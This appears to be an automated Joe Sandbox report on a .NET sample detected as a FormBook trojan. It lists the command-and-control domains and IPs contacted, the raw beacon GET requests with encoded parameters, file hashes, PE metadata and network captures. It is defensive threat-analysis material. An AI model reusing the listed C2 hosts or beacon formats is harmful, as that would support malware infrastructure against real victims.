http://www.ontheroadfromdamascus.com/us94/www.hot-tubs-59198.bond | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.simarnit.comReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/ | explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.l1z3x.cfdReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.terminalcomputer.infoReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.terminalcomputer.info/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.hanabi104.online/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.ontheroadfromdamascus.comReferer: | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.66xecqk.top/us94/ | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.nazadypro.shop | explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
66.235.200.145 | soccercitycupsc.com | United States | 13335 | CLOUDFLARENETUS | true
34.120.175.65 | www.69v39.top | United States | 15169 | GOOGLEUS | false
192.229.221.95 | unknown | United States | 15133 | EDGECASTUS | false
91.195.240.123 | www.emdefencetech.com | Germany | 47846 | SEDO-ASDE | true
104.21.48.68 | www.nazadypro.shop | United States | 13335 | CLOUDFLARENETUS | true
204.79.197.203 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
Joe Sandbox Version: 38.0.0 Beryl
Analysis ID: 1304954
Start date and time: 2023-09-07 08:37:04 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10, Office Professional Plus 2016, Chrome 115, Firefox 115, Adobe Reader 23, Java 8 Update 381
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: 2FcJgghyXg.exe
Original Sample Name: 4f91d6f43a69717ff16f3c09dcd0e7e8.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@173/1@4/6
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 78
• Number of non-executed functions: 155
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: 2FcJgghyXg.exe
Time | Type | Description
08:38:13 | API Interceptor | 1x Sleep call for process: 2FcJgghyXg.exe modified
08:38:23 | API Interceptor | 1504x Sleep call for process: explorer.exe modified
Process: C:\Users\user\Desktop\2FcJgghyXg.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.348426668631405
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKAKhPKIE4oKqiKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh1oPtHochAHKze0HJ
MD5: 3449F05150847E4D3969CCA837E4A6AA
SHA1: 94A23D6FBBD3389B0019674A6B73F4312AF579A7
SHA-256: F6B12276037CDAF4907651D712DA7F4856E2D439F3344CF1C4EA15F74CD0C105
SHA-512: BA4A2F8B480B3FFAD133BF100AF815EE78A9753BE06C22374F7292DC4D0A588851B5AEE1DB78A8F0AE3E030A61DCD6AE25BED9A4C39E2273EF91120D53EA1993
Malicious: false
Reputation: unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\45a9a2a2deda365165595326f2f13be6\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\bf1f4d743828bbf720baf57f6a37ce02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.1938268895265844
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: 2FcJgghyXg.exe
File size: 995'840 bytes
MD5: 4f91d6f43a69717ff16f3c09dcd0e7e8
SHA1: 51406ad0646c199764a7b2a26e2d31fed91ad77f
SHA256: 035c64adedb7e567711f5a793c587b5886bea69e725a5f038f2b7f01a1eebd5d
SHA512: 522ee1826085dfee09138c7e69e02d81a66f0157ffc3164417b2aca5a34891e150615520edb8ddbd817307fa2994b7cd3f14bf4daef1bfb82acb14fd18859ba3
SSDEEP: 12288:GPGFbjnlnvSYq7VFFKtanTtcDPHNtr0P18UEbotQ:GajlnqntLTtcLHNtrK8HJ
TLSH: 5F2553FC5CFC1136D9A0EE908ED9851BB1C0A57FF289AC1D97E20B650252A49F88753F
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................0..(...........F... ...`....@.. ....................................@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4f46ba
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xA9C135F0 [Thu Apr 1 02:22:40 2060 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf4667 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf6000 | 0x5d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf2d90 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xf26c0 | 0xf2800 | False | 0.5605297599871134 | OpenPGP Public Key | 6.197752996370087 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf6000 | 0x5d8 | 0x600 | False | 0.431640625 | data | 4.178744768711675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf8000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xf6090 | 0x348 | data | | | 0.4297619047619048
RT_MANIFEST | 0xf63e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/07/23-08:40:07.074597 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49774 | 80 | 192.168.2.8 | 34.120.175.65
09/07/23-08:39:43.584229 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49773 | 80 | 192.168.2.8 | 66.235.200.145
09/07/23-08:39:22.654043 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49772 | 80 | 192.168.2.8 | 104.21.48.68
09/07/23-08:39:01.528390 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49771 | 80 | 192.168.2.8 | 91.195.240.123
09/07/23-08:40:05.355051 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 59429 | 53 | 192.168.2.8 | 8.8.8.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Sep 7, 2023 08:39:02.193797112 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.193825006 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193857908 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193862915 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.193881989 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.193926096 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.193944931 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:02.334511995 CEST804977191.195.240.123192.168.2.8
                                    Sep 7, 2023 08:39:02.334711075 CEST4977180192.168.2.891.195.240.123
                                    Sep 7, 2023 08:39:22.492707968 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:22.653743982 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.653928995 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:22.654042959 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:22.815152884 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.856993914 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.857034922 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.857064962 CEST8049772104.21.48.68192.168.2.8
                                    Sep 7, 2023 08:39:22.857310057 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:22.857393026 CEST4977280192.168.2.8104.21.48.68
                                    Sep 7, 2023 08:39:43.422524929 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:43.583822966 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:39:43.584053993 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:43.584228992 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:43.745253086 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:39:43.939963102 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:39:43.940239906 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:39:43.940341949 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:43.940463066 CEST4977380192.168.2.866.235.200.145
                                    Sep 7, 2023 08:39:44.101413012 CEST804977366.235.200.145192.168.2.8
                                    Sep 7, 2023 08:40:06.896670103 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:07.074250937 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.074388027 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:07.074596882 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:07.252485991 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392153978 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392225981 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392257929 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392286062 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392321110 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392340899 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392362118 CEST804977434.120.175.65192.168.2.8
                                    Sep 7, 2023 08:40:07.392455101 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:07.392499924 CEST4977480192.168.2.834.120.175.65
                                    Sep 7, 2023 08:40:08.534625053 CEST4977480192.168.2.834.120.175.65
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Sep 7, 2023 08:39:00.929970980 CEST  52932        53         192.168.2.8      8.8.8.8
Sep 7, 2023 08:39:01.207607985 CEST  53           52932      8.8.8.8          192.168.2.8
Sep 7, 2023 08:39:22.286114931 CEST  49250        53         192.168.2.8      8.8.8.8
Sep 7, 2023 08:39:22.491281986 CEST  53           49250      8.8.8.8          192.168.2.8
Sep 7, 2023 08:39:43.147365093 CEST  51962        53         192.168.2.8      8.8.8.8
Sep 7, 2023 08:39:43.421124935 CEST  53           51962      8.8.8.8          192.168.2.8
Sep 7, 2023 08:40:05.355051041 CEST  59429        53         192.168.2.8      8.8.8.8
Sep 7, 2023 08:40:06.894923925 CEST  53           59429      8.8.8.8          192.168.2.8
Timestamp                            Source IP    Dest IP      Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Sep 7, 2023 08:39:00.929970980 CEST  192.168.2.8  8.8.8.8      0xa4a     Standard query (0)  www.emdefencetech.com    A (IP address)  IN (0x0001)  false
Sep 7, 2023 08:39:22.286114931 CEST  192.168.2.8  8.8.8.8      0xa58e    Standard query (0)  www.nazadypro.shop       A (IP address)  IN (0x0001)  false
Sep 7, 2023 08:39:43.147365093 CEST  192.168.2.8  8.8.8.8      0xe5fa    Standard query (0)  www.soccercitycupsc.com  A (IP address)  IN (0x0001)  false
Sep 7, 2023 08:40:05.355051041 CEST  192.168.2.8  8.8.8.8      0x8af1    Standard query (0)  www.69v39.top            A (IP address)  IN (0x0001)  false
Timestamp                            Source IP    Dest IP      Trans ID  Reply Code    Name                     CName                Address          Type                    Class        DNS over HTTPS
Sep 7, 2023 08:39:01.207607985 CEST  8.8.8.8      192.168.2.8  0xa4a     No error (0)  www.emdefencetech.com    -                    91.195.240.123   A (IP address)          IN (0x0001)  false
Sep 7, 2023 08:39:22.491281986 CEST  8.8.8.8      192.168.2.8  0xa58e    No error (0)  www.nazadypro.shop       -                    104.21.48.68     A (IP address)          IN (0x0001)  false
Sep 7, 2023 08:39:22.491281986 CEST  8.8.8.8      192.168.2.8  0xa58e    No error (0)  www.nazadypro.shop       -                    172.67.180.82    A (IP address)          IN (0x0001)  false
Sep 7, 2023 08:39:43.421124935 CEST  8.8.8.8      192.168.2.8  0xe5fa    No error (0)  www.soccercitycupsc.com  soccercitycupsc.com  -                CNAME (Canonical name)  IN (0x0001)  false
Sep 7, 2023 08:39:43.421124935 CEST  8.8.8.8      192.168.2.8  0xe5fa    No error (0)  soccercitycupsc.com      -                    66.235.200.145   A (IP address)          IN (0x0001)  false
Sep 7, 2023 08:40:06.894923925 CEST  8.8.8.8      192.168.2.8  0x8af1    No error (0)  www.69v39.top            -                    34.120.175.65    A (IP address)          IN (0x0001)  false
Sep 7, 2023 08:40:06.894923925 CEST  8.8.8.8      192.168.2.8  0x8af1    No error (0)  www.69v39.top            -                    35.244.161.158   A (IP address)          IN (0x0001)  false
                                    • www.emdefencetech.com
                                    • www.nazadypro.shop
                                    • www.soccercitycupsc.com
                                    • www.69v39.top
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.8  49771        91.195.240.123  80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Sep 7, 2023 08:39:01.528389931 CEST  140                 OUT        GET /us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL HTTP/1.1
                                    Host: www.emdefencetech.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
Sep 7, 2023 08:39:01.876094103 CEST  141                 IN         HTTP/1.1 200 OK
                                    date: Thu, 07 Sep 2023 06:39:01 GMT
                                    content-type: text/html; charset=UTF-8
                                    transfer-encoding: chunked
                                    vary: Accept-Encoding
                                    x-powered-by: PHP/8.1.17
                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    pragma: no-cache
                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Hy6RGj3U2trNFDIi49tEQi0GZsQFxr7l0Ray0Ffsh9iRYzorE4BdUxuNADlZG2tZwzAnW9QWCppMCJ9Mq/PPUA==
                                    last-modified: Thu, 07 Sep 2023 06:39:01 GMT
                                    x-cache-miss-from: parking-6f7d579cd8-6rwdm
                                    server: NginX
                                    connection: close
                                    Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 48 79 36 52 47 6a 33 55 32 74 72 4e 46 44 49 69 34 39 74 45 51 69 30 47 5a 73 51 46 78 72 37 6c 30 52 61 79 30 46 66 73 68 39 69 52 59 7a 6f 72 45 34 42 64 55 78 75 4e 41 44 6c 5a 47 32 74 5a 77 7a 41 6e 57 39 51 57 43 70 70 4d 43 4a 39 4d 71 2f 50 50 55 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 65 6d 64 65 66 65 6e 63 65 74 65 63 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 65 6d 64 65 66 65 6e 63 65 74 65 63 68 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6d 64 65 66 65 6e 63 65 74 65 63 68 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e
                                    Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Hy6RGj3U2trNFDIi49tEQi0GZsQFxr7l0Ray0Ffsh9iRYzorE4BdUxuNADlZG2tZwzAnW9QWCppMCJ9Mq/PPUA==><head><meta charset="utf-8"><title>emdefencetech.com&nbsp;-&nbsp;emdefencetech Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="emdefencetech.com is your first and best source for all of the information youre looking for.
Sep 7, 2023 08:39:01.876183987 CEST  142                 IN         Data Raw: 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 65 6d 64 65 66 65 6e 63 65 74 65 63 68 2e
                                    Data Ascii: From general topics to more of what you would expect to find here, emdefencetech.com has it all. We hope 576you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templa
Sep 7, 2023 08:39:01.876255989 CEST  144                 IN         Data Raw: 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a
                                    Data Ascii: rflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=s576ubmit]{-web
Sep 7, 2023 08:39:01.876389980 CEST  145                 IN         Data Raw: 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f
                                    Data Ascii: announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{tex
Sep 7, 2023 08:39:01.876463890 CEST  146                 IN         Data Raw: 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c
                                    Data Ascii: ontainer-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us_
Sep 7, 2023 08:39:01.876555920 CEST  147                 IN         Data Raw: 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69
                                    Data Ascii: sition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;displ
Sep 7, 2023 08:39:01.876629114 CEST  148                 IN         Data Raw: 35 37 36 0d 0a 72 3a 23 64 65 65 31 65 33 7d 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 2d 39 39 39 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65
                                    Data Ascii: 576r:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:
Sep 7, 2023 08:39:01.876708031 CEST  150                 IN         Data Raw: 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f
                                    Data Ascii: th:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border15D8-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}in
Sep 7, 2023 08:39:01.876780033 CEST  151                 IN         Data Raw: 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74 6f 70 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34 30 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 70 6f 73 69 74 69 6f 6e 3a
                                    Data Ascii: s.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;z-index:-1}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;
Sep 7, 2023 08:39:01.876853943 CEST  152                 IN         Data Raw: 66 64 38 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d
                                    Data Ascii: fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-
